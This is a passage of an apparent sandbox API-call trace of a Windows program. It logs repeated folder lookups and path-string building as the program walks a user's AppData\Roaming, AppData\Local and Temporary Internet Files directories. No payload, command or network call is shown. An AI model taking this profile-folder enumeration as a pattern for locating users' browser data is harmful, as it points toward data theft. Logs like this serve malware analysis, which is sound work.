ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1092798 [0164.388] FindNextFileW (in: hFindFile=0x1092798, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb1ed8fe0, ftLastAccessTime.dwHighDateTime=0x1d73a91, ftLastWriteTime.dwLowDateTime=0xb1ed8fe0, ftLastWriteTime.dwHighDateTime=0x1d73a91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0164.388] GetLastError () returned 0x12 [0164.388] FindClose (in: hFindFile=0x1092798 | out: hFindFile=0x1092798) returned 1 [0164.389] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\temporary internet files" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0x1092798 [0164.389] FindNextFileW (in: hFindFile=0x1092798, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x796e47d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xb10c4320, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xb10c4320, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0164.389] GetLastError () returned 0x12 [0164.389] FindClose (in: hFindFile=0x1092798 | out: hFindFile=0x1092798) returned 1 [0164.391] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0164.392] SysReAllocStringLen (in: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdcc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0164.392] SysReAllocStringLen (in: pbstr=0x28fdd0*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fdd0*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0164.392] SysReAllocStringLen (in: pbstr=0x2b10084*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x2b10084*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0164.392] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0164.392] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming", len=0x22 | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\appdata\\roaming") returned 1 [0164.393] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="roaming", len=0x7 | out: pbstr=0x2b100ec*="roaming") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x28fdc0*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdc0*="c:\\") returned 1 [0164.397] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.398] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.398] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.398] GetLastError () returned 0x12 [0164.398] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.398] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.398] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdc0*="c:\\Users\\") returned 1 [0164.398] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.399] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.399] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.399] GetLastError () returned 0x12 [0164.399] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.399] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.400] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.400] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.400] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.400] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.400] GetLastError () returned 0x12 [0164.400] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.400] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.401] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.401] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="roaming", len=0x7 | out: pbstr=0x28fae8*="roaming") returned 1 [0164.401] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0x108f2c0 [0164.401] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7b73660, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7b73660, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0164.401] GetLastError () returned 0x12 [0164.401] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.402] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0164.402] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0164.403] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0164.403] SysReAllocStringLen (in: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc0*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0164.404] SysReAllocStringLen (in: pbstr=0x28fdc4*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fdc4*="c:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0164.404] SysReAllocStringLen (in: pbstr=0x2b10088*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x2b10088*="c:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0164.404] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0164.407] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local", cchLength=0x20 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local") returned 0x20 [0164.407] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local", len=0x20 | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\appdata\\local") returned 1 [0164.407] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.407] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.408] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.408] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.408] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="local", len=0x5 | out: pbstr=0x2b100ec*="local") returned 1 [0164.413] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.413] SysReAllocStringLen (in: pbstr=0x28fdb4*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdb4*="c:\\") returned 1 [0164.413] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.413] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.413] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.413] GetLastError () returned 0x12 [0164.413] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.414] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.414] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fdb4*="c:\\Users\\") returned 1 [0164.414] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.414] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.414] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.414] GetLastError () returned 0x12 [0164.414] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.415] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.415] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.415] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.415] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.416] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.416] GetLastError () returned 0x12 [0164.416] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.416] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.416] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.416] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0164.417] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x108f2c0 [0164.417] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0164.417] GetLastError () returned 0x12 [0164.417] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.418] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.418] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.419] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.419] SysReAllocStringLen (in: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb4*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.419] SysReAllocStringLen (in: pbstr=0x28fdb8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fdb8*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.420] SysReAllocStringLen (in: pbstr=0x2b1008c*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x2b1008c*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.420] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0164.423] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj", cchLength=0x12 | out: lpsz="c:\\users\\keecfmwgj") returned 0x12 [0164.423] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj", len=0x12 | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj") returned 1 [0164.423] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.424] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.430] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.431] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.431] SysReAllocStringLen (in: pbstr=0x28fda8*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fda8*="c:\\") returned 1 [0164.431] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.431] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.432] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.432] GetLastError () returned 0x12 [0164.432] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.432] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.432] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fda8*="c:\\Users\\") returned 1 [0164.432] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.433] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 